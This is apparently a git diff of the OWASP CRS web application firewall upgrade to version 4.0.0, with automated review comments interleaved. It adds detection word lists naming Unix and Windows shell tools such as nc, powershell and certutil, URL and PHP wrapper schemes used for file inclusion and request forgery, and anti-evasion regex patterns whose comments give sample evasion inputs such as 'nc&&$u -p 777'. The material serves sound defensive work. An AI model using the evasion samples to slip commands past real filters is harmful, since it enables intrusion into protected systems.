if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-upto3.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-upto3.ra <> regex-assembly/include/unix-shell-upto3.ra + +7z +7za +7zr +7zx +GET@ +ab@ +apt@ +ar@ +arj +arp@ +as@ +ash@ +at@ +awk@ +aws@ +bzz@ +c89 +c99 +cat@ +cc@ +cmp +cp@ +csh +cut@ +dd@ +df +dig@ +dir@ +dnf +du@ +eb@ +ed@ +env@ +eqn +es@ +esh +ex@ +fc@ +fd +fg +fi@ +fmt +ftp@ +gcc~ +gdb +gem@ +ghc +git@ +go@ +gpg +grc +hd@ +hup@ +id +ip +irb +jjs +jq +ksh +ld@ +ldd@ +ln@ +lp@ +ls +lua@ +lz4 +lz@ +man@ +mtr +mv@ +nc@ +net@ +nl@ +nm@ +npm@ +od@ +pax@ +pdb +pf@ +pg +php@ +pic@ +pip~ +pkg +pr@ +pry@ +ps@ +ptx +pwd +pxz +rar@ +rc +rcp@ +red@ +rev@ +rm@ +rpm@ +scp +sed@ +set@ +sg@ +sh@ +ss@ +ssh@ +su@ +svn +tac +tar@ +tbl +tcp@ +tee@ +tex@ +tic@ +top +udp +ul@ +vi@ +vim@ +w3m +w@ +wc +who@ +xxd +xz@ +yes@ +yum +zip@ +zsh diff --git a/regex-assembly/include/url-schemes.ra b/regex-assembly/include/url-schemes.ra new file mode 100644 index 0000000000..136606e228 --- /dev/null +++ b/regex-assembly/include/url-schemes.ra 
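Review bot: In the documented regeneration procedure the third step re-reads `original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)"` and runs `spell.sh` on the file, so the additions and removals computed by the first two loops into `result` are discarded; the 4andup variant in this commit does `original="${result}"` and feeds `spell.sh` from `<<<"${result}"`, which is the form this one should use as well. Separately, `english="$(grep -vE 'ip|id|top|set' <<< "${english}")"` is unanchored, so any word containing those substrings (`zip`, `pip`) is also excluded from suffixing; `grep -vxE 'ip|id|top|set'` restricts it to whole-line matches.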
@@ -0,0 +1,120 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This is a list of schemes that can be used for RFI/SSRF (from https://en.wikipedia.org/wiki/List_of_URI_schemes):
+
+acap
+afp
+afs
+attachment
+beshare
+bitcoin
+blob
+callto
+cap
+cid
+cvs
+dav
+data
+dict
+dns
+dntp
+ed2k
+expect
+fd
+feed
+file
+finger
+fish
+ftp
+ftps
+git
+go
+gopher
+h323
+http
+https
+iax
+icap
+imap
+imaps
+ipp
+ipps
+irc
+irc6
+ircs
+jabber
+jar
+ldap
+ldapi
+ldaps
+local_file
+mailto
+maven
+mms
+mumble
+netdoc
+news
+nfs
+nntp
+nntps
+ogg
+paparazzi
+phar
+pop2
+pop3
+pop3s
+pres
+proxy
+psyc
+rmi
+rsync
+rtm
+rtmfp
+rtmp
+s3
+sftp
+sip
+sips
+smb
+smtp
+smtps
+sms
+snews
+snmp
+ssh
+ssh2
+svn
+svn\+ssh
+teamspeak
+telnet
+tftp
+turn
+turns
+udp
+unreal
+ut2004
+ventrilo
+view-source
+vnc
+webcal
+ws
+wss
+xmpp
+xri
+
+##! Adding also the list of PHP (sub)schemes that can be used for RFI/SSRF (from https://www.php.net/manual/en/wrappers.php):
+
+ssh2.shell
+ssh2.exec
+ssh2.tunnel
+ssh2.sftp
+ssh2.scp
+compress.zlib
+compress.bzip2
+zip
+glob
+rar
+ogg
+expect
+php
diff --git a/regex-assembly/include/windows-commands-prefix.ra b/regex-assembly/include/windows-commands-prefix.ra
new file mode 100644
index 0000000000..b59b4bb4ec
--- /dev/null
+++ b/regex-assembly/include/windows-commands-prefix.ra
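Review bot: The PHP wrapper entries leave the dot unescaped (`ssh2.shell`, `compress.zlib`, `compress.bzip2`), so in the assembled regex it matches any character, whereas the other lists in this commit escape literal dots (`nc\.openbsd`, `master\.passwd`); write them as `ssh2\.shell`, `compress\.zlib` and so on unless the assembler escapes for you. `expect` and `ogg` appear in both the generic list and the PHP list; the duplicates are harmless for assembly but add maintenance noise, so drop them from the second list or add a comment that the overlap is intentional. Several two- and three-letter schemes (`fd`, `go`, `s3`, `ws`, `cap`, `cid`, `sms`) will only be safe against false positives if the consuming rule anchors them (e.g. with a following `:`); a short comment naming that expectation would help whoever next edits the rule.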
@@ -0,0 +1,68 @@
+##! Please refer to the documentation at
+##! https://coreruleset.org/docs/development/regex_assembly/.
+
+##! This assembly file generates a prefix match for windows commands.
+##! Command words, in this case, must follow the prefix.
+##! Separate rules target commands that do not follow this prefix,
+##! as the chance of false positives is higher without a prefix match.
+
+##! Note: the quoting prefixes are part of the command prefixes, except for ^
+##! which, for unknown reasons, is not part of the expression
+
+##! ;cmd
+;
+##! {cmd
+\{
+##! |cmd
+\|
+##! ||cmd
+\|\|
+##! &cmd
+&
+##! &&cmd
+&&
+##! \ncmd
+\n
+##! \rcmd
+\r
+##! `cmd
+`
+##!=>
+
+##! match possible white space between prefix expressions
+\s*
+##!=>
+
+##! commands prefix
+##!> assemble
+##! (cmd)
+\(
+##! ,cmd
+,
+##! @cmd
+@
+##! 'cmd'
+'
+##! "cmd"
+\"
+##! spacing+cmd
+\s
+##!<
+##!=>
+
+*
+##!=>
+
+##! paths prefix
+##!> assemble
+##! /path/cmd
+[\w'\"\./]+/
+##! C:\Program Files\cmd
+[\x5c'\"\^]*\w[\x5c'\"\^]*:.*\x5c
+##! \\net\share\dir\cmd
+[\^\.\w '\"/\x5c]*\x5c
+##!<
+##!=>
+
+?[\"\^]*
+##!=>
diff --git a/regex-assembly/include/windows-commands.ra b/regex-assembly/include/windows-commands.ra
new file mode 100644
index 0000000000..5e36d81b92
--- /dev/null
+++ b/regex-assembly/include/windows-commands.ra
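Review bot: The header states that `^` is excluded from the quoting prefixes "for unknown reasons"; an unexplained omission in an evasion-prefix cannot be reviewed, and the path alternatives in the same file do accept it (`[\x5c'\"\^]*`), so either record the reason (an issue link in the comment) or add `\^` to the quoting `assemble` block next to `'` and `\"` so the two halves agree. The trailing `?[\"\^]*` line applies a `?` to whatever precedes it after assembly; a one-line `##!` comment saying which group it makes optional would save the next reader from re-deriving it.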
@@ -0,0 +1,299 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Word list for rule 932380 (RCE Windows command injection part 2/2) +##! +##! The list comes from the Microsoft Windows Server documentation. +##! You can get it using the following one-liner: +##! `curl https://raw.githubusercontent.com/MicrosoftDocs/windowsserverdocs/main/WindowsServerDocs/administration/windows-commands/windows-commands.md | grep -oE '^-\s\[\w+\]' | cut -f2 -d[ | cut -f1 -d]` + +active +add +append +arp +assign +assoc +at +atmadm +attrib +attributes +auditpol +autochk +autoconv +autofmt +automount +bcdboot +bcdedit +bdehdcfg +bitsadmin +bootcfg +break +cacls +call +cd +certreq +certutil +change +chcp +chdir +chglogon +chgport +chgusr +chkdsk +chkntfs +choice +cipher +clean +cleanmgr +clip +cls +cmd +cmdkey +cmstp +color +comp +compact +convert +copy +create +cscript +date +dcdiag +dcgpofix +defrag +del +delete +detail +dfsdiag +dfsrmig +diantz +dir +diskcomp +diskcopy +diskpart +diskperf +diskraid +diskshadow +dispdiag +dnscmd +doskey +driverquery +echo +edit +endlocal +erase +eventcreate +Evntcmd +exec +exit +expand +expose +extend +extract +fc +filesystems +find +findstr +finger +flattemp +fondue +for +forfiles +format +freedisk +fsutil +ftp +ftype +fveupdate +getmac +gettype +goto +gpfixup +gpresult +gpt +gpupdate +graftabl +help +helpctr +hostname +icacls +if +inactive +ipconfig +ipxroute +irftp +jetpack +klist +ksetup +ktmutil +ktpass +label +list +lodctr +logman +logoff +lpq +lpr +macfile +makecab +mapadmin +md +mkdir +mklink +mmc +mode +more +mount +mountvol +move +mqbkup +mqsvc +mqtgsvc +msdt +msg +msiexec +msinfo32 +mstsc +nbtstat +netcfg +netdom +netsh +netstat +nfsadmin +nfsshare +nfsstat +nlbmgr +nltest +nslookup +ntbackup +ntcmdprompt +ntfrsutl +offline +online +openfiles +pagefileconfig +path +pathping +pause +pbadmin +pentnt +perfmon +ping +pktmon +pnpunattend +pnputil +popd +powershell +print +prncnfg 
+prndrvr +prnjobs +prnmngr +prnport +prnqctl +prompt +pubprn +pushd +pushprinterconnections +pwlauncher +pwsh +qappsrv +qprocess +query +quser +qwinsta +rd +rdpsign +recover +refsutil +reg +regini +regsvr32 +relog +rem +remove +ren +rename +repadmin +repair +replace +rescan +reset +retain +revert +rexec +risetup +rmdir +robocopy +rpcinfo +rpcping +rsh +rundll32 +rwinsta +san +schtasks +scwcmd +secedit +select +serverceipoptin +servermanagercmd +serverweroptin +setx +sfc +shadow +shift +showmount +shrink +shutdown +sort +start +subst +sxstrace +sysocmgr +systeminfo +takeown +tapicfg +taskkill +tasklist +tcmsetup +telnet +tftp +time +timeout +title +tlntadmn +tpmtool +tpmvscmgr +tracerpt +tracert +tree +tscon +tsdiscon +tsecimp +tskill +tsprof +type +typeperf +tzutil +unexpose +uniqueid +unlodctr +ver +verifier +verify +vol +vssadmin +waitfor +wbadmin +wdsutil +wecutil +wevtutil +where +whoami +winnt +winnt32 +winrs +wmic +writer +wscript +xcopy diff --git a/regex-assembly/toolchain.yaml b/regex-assembly/toolchain.yaml new file mode 100644 index 0000000000..d921b799b1 --- /dev/null +++ b/regex-assembly/toolchain.yaml 
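Review bot: `Evntcmd` is the only capitalised entry in the word list; if rule 932380 lowercases its target before matching (which the all-lowercase rest of the list suggests), that term can never match and should be `evntcmd`, and if the rule does not lowercase, every other entry would miss mixed-case input. The generator one-liner in the header pulls every `\w+` link text from the Microsoft page, so the list also carries very common English words (`add`, `at`, `call`, `date`, `find`, `for`, `help`, `if`, `more`, `print`, `sort`, `time`, `type`, `where`); the anti-evasion suffix in toolchain.yaml requires a following token, but a comment stating that these were reviewed and kept deliberately would make future false-positive triage faster.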
@@ -0,0 +1,46 @@ +# # # # # # # # # # # # # # # # # # # # +# configuration file for crs-toolchain +# # # # # # # # # # # # # # # # # # # # +patterns: + # The Unix evasion patterns, were extended per decision in https://github.com/coreruleset/coreruleset/issues/2632. + anti_evasion: + # - [\x5c'\"\[)]: common evasion tokens and path expansion, e.g., `/bin/[c]''a""\t` + # - (?:\|\||&&)\s*: hiding of empty variables through logial operators, e.g., `nc&&$u -p 777` + # - \$[a-z0-9_@?!#{(*-]*: empty variable evasion, e.g., `n\$uc -p 777` + # - [\x5c'\"\[)], \$[a-z0-9_@?!#{(*-]*: arithmetic expansion evasion, e.g., `c$((9))9` + unix: | + [\x5c'\"\[)]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{(*-]*)?\x5c? + windows: | + [\"\^]* + anti_evasion_suffix: + # - <>: redirection, e.g., `cat,&|)].* + # "more foo", "more,foo", "more;foo", "more.com", "more/e", + # "morefoo" + windows: | + [\s,;./<>].* + # Same as above but does not allow any white space as the next token. + # This is useful for words like `python3`, where `python@` would + # create too many false positives because it would match `python `. + anti_evasion_no_space_suffix: + # This will match: + # + # python<<,&|]|(?:[\w\d._-][\x5c'\"\[]*(?:(?:(?:\|\||&&)\s*)?\$[a-z0-9_@?!#{*-]*)?\x5c?)+[\s<>,&|]).* + # This will match: + # + # python,foo + # python2 foo + # + # It will _not_ match: + # python foo + windows: | + (?:[,;./<>]|(?:[\w\d._-][\"\^]*)+[\s,;./<>]).* diff --git a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example index 8a23edafb0..620aca673b 100644 --- a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example +++ b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example 
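Review bot: `anti_evasion.unix` allows `(` in the empty-variable class (`\$[a-z0-9_@?!#{(*-]*`, explained by the `c$((9))9` example) while `anti_evasion_no_space_suffix.unix` omits it (`\$[a-z0-9_@?!#{*-]*`); if the difference is deliberate a comment should say so, otherwise the two classes should be aligned so the no-space suffix does not silently lose the arithmetic-expansion case. The `anti_evasion_suffix` comment block reads as truncated in this rendering (`# - <>: redirection, e.g., \`cat,&|)].*` and the `python<<,&|]|...` example); worth checking that the committed file carries the full explanatory text and examples.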
@@ -1,8 +1,9 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.3.0
+# OWASP CRS ver.4.0.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
-# The OWASP ModSecurity Core Rule Set is distributed under
+# The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
@@ -81,9 +82,9 @@
 # This ruleset allows you to control how ModSecurity will handle traffic
 # originating from Authorized Vulnerability Scanning (AVS) sources. See
 # related blog post -
-# http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html
+# https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-advanced-topic-of-the-week-handling-authorized-scanning-traffic/
 #
-# White-list ASV network block (no blocking or logging of AVS traffic) Update
+# Allow List ASV network block (no blocking or logging of AVS traffic) Update
 # IP network block as appropriate for your AVS traffic
 #
 # ModSec Rule Exclusion: Disable Rule Engine for known ASV IP
@@ -129,7 +130,7 @@
 # Example Exclusion Rule: Removing a specific ARGS parameter from inspection
 # for all CRS rules
 #
-# This rule illustrates that we can use tagging very effectively to whitelist a
+# This rule illustrates that we can use tagging very effectively to allow list a
 # common false positive across an entire ModSecurity instance. This can be done
 # because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT
 # affect custom rules.
@@ -149,6 +150,10 @@
 # This rule illustrates that we can remove a rule range via a ctl action.
 # This uses the fact, that rules are grouped by topic in rule files covering
 # a certain id range.
+# IMPORTANT: ModSecurity v3, aka libModSecurity, does not currently support the
+# use of rule ranges in a ruleRemoveById ctl action (this feature has been
+# planned for v3.1). Consider using ruleRemoveByTag as a workaround, if
+# appropriate.
 #
 # ModSecurity Rule Exclusion: Disable all SQLi and XSS rules
 # SecRule REQUEST_FILENAME "@beginsWith /admin" \
@@ -159,7 +164,37 @@
 # ctl:ruleRemoveById=941000-942999"
 #
 #
-# The application specific rule exclusion files
-# REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
-# REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf
-# bring additional examples which can be useful then tuning a service.
+# The application-specific rule exclusion plugins
+# (see: https://github.com/coreruleset/plugin-registry)
+# provide additional examples which can be useful then tuning a service.
+
+
+#
+# Example Rule: Allow monitoring tools and scripts
+#
+# Uncomment this rule to allow all requests from trusted IPs and User-Agent.
+# This can be useful for monitoring tools like Monit, Nagios, or other agents.
+# For example, if you're using AWS Load Balancer, you may need to trust all
+# requests from "10.0.0.0/8" subnet that come with the user-agent
+# "ELB-HealthChecker/2.0". By doing this, all requests that match these
+# conditions will not be matched against the following rules:
+#
+# - id: 911100 (allowed methods)
+# - id: 913100 (scan detection)
+# - id: 920280 (missing/empty host header)
+# - id: 920350 (IP address in host header)
+# - tag: attack-disclosure (all RESPONSE-*-DATA-LEAKAGES rules)
+#
+# SecRule REMOTE_ADDR "@ipMatch 10.0.0.0/8" \
+# "id:1005,\
+# phase:1,\
+# pass,\
+# nolog,\
+# chain"
+# SecRule REQUEST_METHOD "@pm GET HEAD" "chain"
+# SecRule REQUEST_HEADERS:User-Agent "@pm ELB-HealthChecker" \
+# "ctl:ruleRemoveById=911100,\
+# ctl:ruleRemoveById=913100,\
+# ctl:ruleRemoveById=920280,\
+# ctl:ruleRemoveById=920350,\
+# ctl:ruleRemoveByTag=attack-disclosure"
diff --git a/rules/REQUEST-901-INITIALIZATION.conf b/rules/REQUEST-901-INITIALIZATION.conf
index 2a6f74e402..984252ec55 100644
--- a/rules/REQUEST-901-INITIALIZATION.conf
+++ b/rules/REQUEST-901-INITIALIZATION.conf
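Review bot: The new example disables rules 911100/913100/920280/920350 and every attack-disclosure rule for any client in 10.0.0.0/8 whose User-Agent contains `ELB-HealthChecker`, but the User-Agent is client-supplied, so the IP match is the only real trust anchor; behind a reverse proxy or load balancer REMOTE_ADDR is frequently the proxy's own address, in which case the exemption would apply to every forwarded request. The explanatory comment should say so, e.g. `# NOTE: the User-Agent is client-controlled; only use this when REMOTE_ADDR is the real client address (not a proxy) and keep the IP range as narrow as possible.` The wording `can be useful then tuning a service` carried over from the old text should read `when tuning`.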
@@ -1,8 +1,9 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.3.0
+# OWASP CRS ver.4.0.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
-# The OWASP ModSecurity Core Rule Set is distributed under
+# The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
@@ -11,7 +12,7 @@
 # This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules
 # and performs preparatory actions. It also fixes errors and omissions
 # of variable definitions in the file crs-setup.conf.
-# The setup.conf can and should be edited by the user, this file
+# The crs-setup.conf can and should be edited by the user, this file
 # is part of the CRS installation and should not be altered.
 #
@@ -23,9 +24,9 @@
 #
 # - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
 #
-# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature
+# Ref: https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#seccomponentsignature
 #
-SecComponentSignature "OWASP_CRS/3.3.0"
+SecComponentSignature "OWASP_CRS/4.0.0"
 #
 # -=[ Default setup values ]=-
@@ -57,8 +58,8 @@ SecRule &TX:crs_setup_version "@eq 0" \
 status:500,\
 log,\
 auditlog,\
- msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
- ver:'OWASP_CRS/3.3.0',\
+ msg:'ModSecurity CRS is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL'"
@@ -66,62 +67,80 @@ SecRule &TX:crs_setup_version "@eq 0" \
 # -=[ Default setup values ]=-
 #
 # Some constructs or individual rules will fail if certain parameters
-# are not set in the setup.conf file. The following rules will catch
+# are not set in the crs-setup.conf file. The following rules will catch
 # these cases and assign sane default values.
 #
-# Default Inbound Anomaly Threshold Level (rule 900110 in setup.conf)
+# Default Inbound Anomaly Threshold Level (rule 900110 in crs-setup.conf)
 SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
 "id:901100,\
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 setvar:'tx.inbound_anomaly_score_threshold=5'"
-# Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf)
+# Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf)
 SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
 "id:901110,\
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 setvar:'tx.outbound_anomaly_score_threshold=4'"
-# Default Paranoia Level (rule 900000 in setup.conf)
-SecRule &TX:paranoia_level "@eq 0" \
+# Default Reporting Level (rule 900115 in crs-setup.conf)
+SecRule &TX:reporting_level "@eq 0" \
+ "id:901111,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0',\
+ setvar:'tx.reporting_level=4'"
+
+# Default Early Blocking (rule 900120 in crs-setup.conf)
+SecRule &TX:early_blocking "@eq 0" \
+ "id:901115,\
+ phase:1,\
+ pass,\
+ nolog,\
+ ver:'OWASP_CRS/4.0.0',\
+ setvar:'tx.early_blocking=0'"
+
+# Default Blocking Paranoia Level (rule 900000 in crs-setup.conf)
+SecRule &TX:blocking_paranoia_level "@eq 0" \
 "id:901120,\
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
- setvar:'tx.paranoia_level=1'"
+ ver:'OWASP_CRS/4.0.0',\
+ setvar:'tx.blocking_paranoia_level=1'"
-# Default Executing Paranoia Level (rule 900000 in setup.conf)
-SecRule &TX:executing_paranoia_level "@eq 0" \
+# Default Detection Paranoia Level (rule 900001 in crs-setup.conf)
+SecRule &TX:detection_paranoia_level "@eq 0" \
 "id:901125,\
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
- setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'"
+ ver:'OWASP_CRS/4.0.0',\
+ setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'"
-# Default Sampling Percentage (rule 900400 in setup.conf)
+# Default Sampling Percentage (rule 900400 in crs-setup.conf)
 SecRule &TX:sampling_percentage "@eq 0" \
 "id:901130,\
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 setvar:'tx.sampling_percentage=100'"
-# Default Anomaly Scores (rule 900100 in setup.conf)
+# Default Anomaly Scores (rule 900100 in crs-setup.conf)
 SecRule &TX:critical_anomaly_score "@eq 0" \
 "id:901140,\
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 setvar:'tx.critical_anomaly_score=5'"
 SecRule &TX:error_anomaly_score "@eq 0" \
@@ -129,7 +148,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 setvar:'tx.error_anomaly_score=4'"
 SecRule &TX:warning_anomaly_score "@eq 0" \
@@ -137,7 +156,7 @@ SecRule &TX:warning_anomaly_score "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 setvar:'tx.warning_anomaly_score=3'"
 SecRule &TX:notice_anomaly_score "@eq 0" \
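Review bot: Rule 901125 seeds `tx.detection_paranoia_level` from `%{TX.blocking_paranoia_level}`, which is only guaranteed to be populated because rule 901120 precedes it in the same phase; a comment above 901125 such as `# Depends on 901120 having set tx.blocking_paranoia_level first (same phase, lower id)` would stop a future reorder or renumbering from silently leaving the detection level empty. The macro is written in mixed case (`TX.blocking_paranoia_level`) while the line it replaces used `TX.PARANOIA_LEVEL`; harmless if the engine treats variable names case-insensitively, but the file otherwise uses one convention and this should follow it.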
@@ -145,99 +164,90 @@ SecRule &TX:notice_anomaly_score "@eq 0" \ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.notice_anomaly_score=2'" -# Default do_reput_block -SecRule &TX:do_reput_block "@eq 0" \ - "id:901150,\ - phase:1,\ - pass,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.do_reput_block=0'" - -# Default block duration -SecRule &TX:reput_block_duration "@eq 0" \ - "id:901152,\ - phase:1,\ - pass,\ - nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.reput_block_duration=300'" - -# Default HTTP policy: allowed_methods (rule 900200) +# Default HTTP policy: allowed_methods (rule 900200 in crs-setup.conf) SecRule &TX:allowed_methods "@eq 0" \ "id:901160,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" -# Default HTTP policy: allowed_request_content_type (rule 900220) +# Default HTTP policy: allowed_request_content_type (rule 900220 in crs-setup.conf) SecRule &TX:allowed_request_content_type "@eq 0" \ "id:901162,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" -# Default HTTP policy: allowed_request_content_type_charset (rule 900270) +# Default HTTP policy: allowed_request_content_type_charset (rule 900280 in crs-setup.conf) SecRule &TX:allowed_request_content_type_charset "@eq 0" \ 
"id:901168,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'" -# Default HTTP policy: allowed_http_versions (rule 900230) +# Default HTTP policy: allowed_http_versions (rule 900230 in crs-setup.conf) SecRule &TX:allowed_http_versions "@eq 0" \ "id:901163,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" -# Default HTTP policy: restricted_extensions (rule 900240) +# Default HTTP policy: restricted_extensions (rule 900240 in crs-setup.conf) SecRule &TX:restricted_extensions "@eq 0" \ "id:901164,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" -# Default HTTP policy: restricted_headers (rule 900250) -SecRule &TX:restricted_headers "@eq 0" \ +# Default HTTP policy: restricted_headers_basic (rule 900250 in crs-setup.conf) +SecRule &TX:restricted_headers_basic "@eq 0" \ "id:901165,\ 
phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.restricted_headers=/proxy/ /lock-token/ /content-range/ /if/'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'" -# Default HTTP policy: static_extensions (rule 900260) -SecRule &TX:static_extensions "@eq 0" \ - "id:901166,\ +# Default HTTP policy: restricted_headers_extended (rule 900255 in crs-setup.conf) +SecRule &TX:restricted_headers_extended "@eq 0" \ + "id:901171,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ - setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.restricted_headers_extended=/accept-charset/'" -# Default enforcing of body processor URLENCODED +# Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf) SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ "id:901167,\ phase:1,\ pass,\ nolog,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" +# Default check for UTF8 encoding validation (rule 900950 in crs-setup.conf) +SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ + "id:901169,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0',\ + setvar:'tx.crs_validate_utf8_encoding=0'" + # # -=[ Initialize internal variables ]=- # @@ -245,7 +255,6 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ # Initialize anomaly scoring variables. # All _score variables start at 0, and are incremented by the various rules # upon detection of a possible attack. -# sql_error_match is used for shortcutting rules for performance reasons. SecAction \ "id:901200,\ 
